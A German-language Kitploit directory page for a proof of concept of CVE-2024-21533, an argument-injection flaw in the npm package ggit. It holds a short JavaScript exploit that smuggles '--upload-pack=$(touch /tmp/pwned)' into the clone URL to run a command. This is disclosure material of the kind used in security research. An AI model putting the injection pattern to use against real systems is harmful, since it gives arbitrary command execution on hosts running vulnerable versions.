Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-21533-PoC-ggit — CVE-2024-21533 PoC ggit | Kitploit
Tools/GitHubGitHub/lirantal/cve-2024-21533-poc-ggit
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationSupply Chain Security
GitHublirantal/cve-2024-21533-poc-ggit

CVE-2024-21533-PoC-ggit

CVE-2024-21533 PoC ggit

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-21533 Argument Injection-Schwachstelle in ggit

ggit beschreibt sich selbst als:

root@kitploit:~
Local promise-returning git command wrappers

Ressourcen:

  • Quellcode des Projekts auf GitHub: https://github.com/bahmutov/ggit
  • npm-Paket des Projekts: https://www.npmjs.com/package/ggit

Artikel über diese Argument-Injection-Schwachstelle: https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability

Hintergrund zur Ausnutzung

Ich melde eine Argument Injection-Schwachstelle im npm-Paket ggit.

Diese Schwachstelle tritt in der clone()-API der Bibliothek auf, mit der die entfernte URL zum Klonen und das Zielverzeichnis auf der Festplatte angegeben werden können. Allerdings bereinigt die Bibliothek keine Benutzereingaben oder validiert ein gegebenes URL-Schema, noch übergibt sie korrekt Befehlszeilenflags an die git-Binärdatei unter Verwendung der doppelten POSIX-Zeichen (--), um das Ende der Optionen zu kennzeichnen.

Dadurch können Benutzer eine Argument-Injection-Schwachstelle in Git ausnutzen, da die Befehlszeilen-Option --upload-pack zur Ausführung beliebiger Befehle führt. (outPath) zum Klonen und dann trifft die Schwachstelle zu.

Exploit

  1. Installieren Sie [email protected] oder früher
  2. Erstellen Sie den folgenden POC:
root@kitploit:~
const clone = require("ggit").cloneRepo;
clone({
  url: "--upload-pack=$(touch /tmp/pwned)",
  folder: "/tmp/dbd",
}).then(function () {
  console.log("cloned repo to destination folder");
});
  1. Beobachten Sie, dass auf der Festplatte eine neue Datei unter /tmp/pwned erstellt wurde.

Mitwirken

Bitte lesen Sie CONTRIBUTING für Richtlinien zur Mitarbeit an diesem Projekt.

Autor

Liran Tal

Tool herunterladen